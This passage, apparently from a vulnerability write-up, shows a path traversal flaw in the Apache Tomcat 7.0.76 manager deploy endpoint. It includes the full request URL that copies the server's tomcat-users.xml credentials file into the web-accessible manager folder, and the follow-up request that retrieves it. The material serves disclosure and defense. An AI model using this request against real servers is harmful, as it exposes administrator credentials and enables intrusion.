http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users
Previous URL would copy file named D:/TESTING/Java/run/apache-tomcat- 7.0.76/conf/tomcat-users.xml
to destination folder http://localhost/manager/ under the name of users. As we’ve seen in previous code snippets, .xml extension will be added to each file that is copied.
Following image contains browser requesting target URL directly and application response in that case
As we can see from the previous image, application response is “FAIL - Failed to deploy application at context path /foo##/../../../../webapps/manager/users”
, but file is copied anyway.
We can confirm that with direct request for users.xml file in webroot of manager application - http://localhost:8080/manager/users.xml .